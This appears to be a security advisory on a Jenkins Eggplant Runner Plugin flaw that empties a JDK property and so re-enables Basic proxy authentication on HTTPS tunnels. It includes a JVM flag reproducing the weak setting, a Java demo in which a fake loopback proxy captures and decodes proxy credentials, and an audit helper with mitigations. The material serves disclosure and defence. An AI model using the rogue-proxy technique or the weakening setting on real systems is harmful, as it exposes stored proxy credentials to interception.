The Jenkins Eggplant Runner Plugin, versions 0.0.1.301.v963cffe8ddb and earlier, configures its proxy settings by programmatically setting the Java system property `jdk.http.auth.tunneling.disabledSchemes` to an empty string. That property is a JDK networking control: it lists the authentication schemes the JDK refuses to use when answering a `407 Proxy Authentication Required` challenge on a `CONNECT` request, i.e. when tunnelling HTTPS through an HTTP proxy. Since Java 8u111 its default value is `Basic`, the mitigation Oracle shipped for CVE-2016-5597: a Basic `Proxy-Authorization` header on a `CONNECT` request carries the proxy username and password merely base64-encoded, and the TLS session that would protect it has not been established yet at that point. Setting the property to an empty string removes every scheme from that deny-list and so re-enables Basic proxy authentication for the whole Jenkins JVM, not only for the plugin's own requests. Consequently, if the Jenkins instance is configured to use an authenticating proxy, the proxy credentials stored in Jenkins can be transmitted in a trivially recoverable form and intercepted by anyone who can observe or impersonate the hop between Jenkins and the proxy.
Platform: Jenkins Plugin
Version: <= 0.0.1.301.v963cffe8ddb
Vulnerability : Protection Mechanism Bypass
Severity: Moderate
Date: 2024-10-29
Prediction: 2024-12-15
What Undercode Says:
What the plugin does (clears the JDK deny-list at runtime, JVM-wide): `System.setProperty("jdk.http.auth.tunneling.disabledSchemes", "");`
Equivalent JVM flag that reproduces the weak setting at startup, which is also the reliable way to set the property because the JDK reads it once when its HTTP client class initialises: `java -Djdk.http.auth.tunneling.disabledSchemes="" -jar jenkins.war`
Reading back the current system-property value (e.g. from the Jenkins Script Console); `null` means no system property is set and the JDK falls back to the `net.properties` default, `Basic`: `String disabledSchemes = System.getProperty("jdk.http.auth.tunneling.disabledSchemes");`
How Exploit:
An attacker who can stand in for the proxy or observe the hop between Jenkins and the proxy (a rogue proxy, or passive capture on that network segment) answers Jenkins' `CONNECT` request with a `Proxy-Authenticate: Basic` challenge. With the deny-list emptied, the JDK retries the `CONNECT` with `Proxy-Authorization: Basic <base64(user:password)>` over the still-unencrypted connection, and the attacker base64-decodes the Jenkins proxy credentials from the captured traffic. Note that these are the proxy credentials configured in Jenkins, not the credentials of individual Jenkins users.
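To show concretely what the property gates, here is an added Java demo; it is not the plugin's, Jenkins' or the JDK's code. A fake proxy on loopback challenges the `CONNECT` with Basic only and records what the JDK sends back, which is exactly what a rogue proxy or a passive observer on that hop would see. The credentials `jenkins-proxy`/`s3cret` are constructed stand-ins for the proxy credentials Jenkins would hold, and `target.example` is a placeholder host that is never reached.

```java
import java.io.*;
import java.net.*;
import java.nio.charset.StandardCharsets;
import java.util.Base64;

/**
 * Demonstrates what jdk.http.auth.tunneling.disabledSchemes controls.
 * Run twice:  java TunnelAuthDemo Basic   (JDK default since 8u111: Basic refused for the tunnel)
 *             java TunnelAuthDemo ""      (what the plugin does: credentials sent base64-encoded)
 */
public class TunnelAuthDemo {
    // Constructed demo credentials standing in for the proxy user/password configured in Jenkins.
    static final String PROXY_USER = "jenkins-proxy";
    static final String PROXY_PASS = "s3cret";

    /** What the fake proxy (i.e. an attacker on the Jenkins-to-proxy hop) observed, if anything. */
    static volatile String observedProxyAuthorization = null;

    /** Minimal fake proxy: 407 + Basic challenge on the first CONNECT, then record the retry. */
    static void fakeProxy(ServerSocket server) {
        try {
            while (!server.isClosed()) {
                try (Socket s = server.accept()) {
                    BufferedReader in = new BufferedReader(
                            new InputStreamReader(s.getInputStream(), StandardCharsets.ISO_8859_1));
                    String line, authz = null;
                    while ((line = in.readLine()) != null && !line.isEmpty()) {
                        if (line.regionMatches(true, 0, "Proxy-Authorization:", 0, 20)) {
                            authz = line.substring(20).trim();
                        }
                    }
                    OutputStream out = s.getOutputStream();
                    if (authz == null) {
                        // Offer only Basic, the scheme the JDK default forbids on tunnels.
                        out.write(("HTTP/1.1 407 Proxy Authentication Required\r\n"
                                + "Proxy-Authenticate: Basic realm=\"demo\"\r\n"
                                + "Content-Length: 0\r\nConnection: close\r\n\r\n")
                                .getBytes(StandardCharsets.ISO_8859_1));
                    } else {
                        observedProxyAuthorization = authz;
                        out.write("HTTP/1.1 200 Connection established\r\n\r\n"
                                .getBytes(StandardCharsets.ISO_8859_1));
                    }
                    out.flush();
                    // Socket is closed here; the client's TLS handshake then fails, which is fine.
                }
            }
        } catch (IOException ignored) {
            // server socket closed by main once the client attempt is over
        }
    }

    public static void main(String[] args) throws Exception {
        // Must run before the JDK's HttpURLConnection class initialises: OpenJDK copies the
        // value into a static set at that point. -D on the command line is the dependable way.
        String value = args.length > 0 ? args[0] : "Basic";
        System.setProperty("jdk.http.auth.tunneling.disabledSchemes", value);

        ServerSocket server = new ServerSocket(0, 50, InetAddress.getLoopbackAddress());
        Thread proxyThread = new Thread(() -> fakeProxy(server));
        proxyThread.setDaemon(true);
        proxyThread.start();

        // How Jenkins-style code supplies proxy credentials to the JDK HTTP client.
        Authenticator.setDefault(new Authenticator() {
            @Override protected PasswordAuthentication getPasswordAuthentication() {
                if (getRequestorType() == RequestorType.PROXY) {
                    return new PasswordAuthentication(PROXY_USER, PROXY_PASS.toCharArray());
                }
                return null;
            }
        });

        Proxy proxy = new Proxy(Proxy.Type.HTTP,
                new InetSocketAddress(InetAddress.getLoopbackAddress(), server.getLocalPort()));
        HttpURLConnection conn = (HttpURLConnection) new URL("https://target.example/").openConnection(proxy);
        conn.setConnectTimeout(3000);
        conn.setReadTimeout(3000);
        try {
            conn.getResponseCode(); // forces the CONNECT; the TLS handshake afterwards is expected to fail
        } catch (IOException e) {
            System.out.println("client: " + e.getMessage());
        } finally {
            server.close();
        }

        System.out.println("disabledSchemes=\"" + value + "\"");
        if (observedProxyAuthorization == null) {
            System.out.println("proxy saw no Proxy-Authorization header: Basic refused for the tunnel");
        } else {
            String decoded = new String(Base64.getDecoder().decode(observedProxyAuthorization.split(" ", 2)[1]),
                    StandardCharsets.UTF_8);
            System.out.println("proxy saw: Proxy-Authorization: " + observedProxyAuthorization);
            System.out.println("decoded:   " + decoded);
        }
    }
}
```

With `Basic` the JDK never retries the `CONNECT` and the client fails with an "Unable to tunnel through proxy" error; with `""` the fake proxy prints the `Proxy-Authorization: Basic ...` header and the decoded `jenkins-proxy:s3cret`. Because the property is captured when the JDK's HTTP client class initialises, run each variant in a fresh JVM.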
Protection from this CVE
Until a fixed plugin release is available: uninstall or disable the plugin; verify the effective value of `jdk.http.auth.tunneling.disabledSchemes` on the Jenkins controller (a `-Djdk.http.auth.tunneling.disabledSchemes=Basic` flag on the Jenkins command line restores the JDK default regardless of what a plugin sets later, because the JDK reads the property once when its HTTP client class initialises); keep the Jenkins controller on a network segment where the proxy hop cannot be observed or spoofed; and prefer a proxy that does not require authentication, or one that challenges with a scheme other than Basic, so that no reusable password crosses the unencrypted `CONNECT` request. Keep monitoring for an official patch.
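The check above, as an added audit helper that is not part of the plugin or of Jenkins: it resolves the property the way the JDK does (system property first, then the `net.properties` file shipped with the runtime, under `conf/` on Java 9+ and `lib/` on Java 8), parses the comma-separated, case-insensitive scheme list, and reports whether Basic is currently allowed on HTTPS proxy tunnels. The class and method names are this example's own. Since Groovy accepts Java syntax, the same logic can be pasted into the Jenkins Script Console.

```java
import java.io.IOException;
import java.io.InputStream;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.LinkedHashSet;
import java.util.Locale;
import java.util.Properties;
import java.util.Set;

/** Reports whether the CVE-2016-5597 mitigation (Basic blocked on HTTPS proxy tunnels) is in effect. */
public class TunnelingSchemeAudit {
    static final String KEY = "jdk.http.auth.tunneling.disabledSchemes";

    /** Parse the property like the JDK: comma-separated, whitespace-trimmed, case-insensitive. */
    static Set<String> parseDisabledSchemes(String value) {
        Set<String> out = new LinkedHashSet<>();
        if (value == null) return out;
        for (String s : value.split(",")) {
            String t = s.trim();
            if (!t.isEmpty()) out.add(t.toUpperCase(Locale.ROOT));
        }
        return out;
    }

    /** True when "Basic" is absent from the deny-list, i.e. the plugin's empty string has taken effect. */
    static boolean basicTunnelingAllowed(String value) {
        return !parseDisabledSchemes(value).contains("BASIC");
    }

    /** JDK default from net.properties; null if the file cannot be found or read. */
    static String netPropertiesDefault() {
        String home = System.getProperty("java.home");
        for (String dir : new String[] {"conf", "lib"}) {
            Path p = Paths.get(home, dir, "net.properties");
            if (Files.isRegularFile(p)) {
                Properties props = new Properties();
                try (InputStream in = Files.newInputStream(p)) {
                    props.load(in);
                    return props.getProperty(KEY);
                } catch (IOException e) {
                    return null;
                }
            }
        }
        return null;
    }

    /** Effective value as the JDK resolves it: an explicit system property wins over net.properties. */
    static String effectiveValue() {
        String sys = System.getProperty(KEY);
        return sys != null ? sys : netPropertiesDefault();
    }

    public static void main(String[] args) {
        String sys = System.getProperty(KEY);
        String eff = effectiveValue();
        System.out.println("system property : " + (sys == null ? "(unset)" : "\"" + sys + "\""));
        System.out.println("net.properties  : " + netPropertiesDefault());
        System.out.println("effective value : " + eff + " -> disabled " + parseDisabledSchemes(eff));
        System.out.println(basicTunnelingAllowed(eff)
                ? "WARNING: Basic auth allowed on HTTPS proxy tunnels (CVE-2016-5597 mitigation off)"
                : "OK: Basic auth blocked on HTTPS proxy tunnels");
    }
}
```

One caveat when running this inside a live Jenkins JVM: it shows the value as currently set, which is what the JDK would pick up at class-initialisation time. OpenJDK copies the property into a static set when `sun.net.www.protocol.http.HttpURLConnection` first initialises, so a `System.setProperty` executed later (as the plugin does) is visible here but may or may not have changed the JDK's actual behaviour; the `-D` flag on the Jenkins command line is the only setting that is guaranteed to be what the JDK enforces.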
Impact:
Exposure of the proxy credentials configured in Jenkins. Bypass of the JDK's CVE-2016-5597 mitigation (Basic authentication re-enabled for HTTPS proxy tunnels, JVM-wide). Information disclosure.
Sources:
Reported By: github.com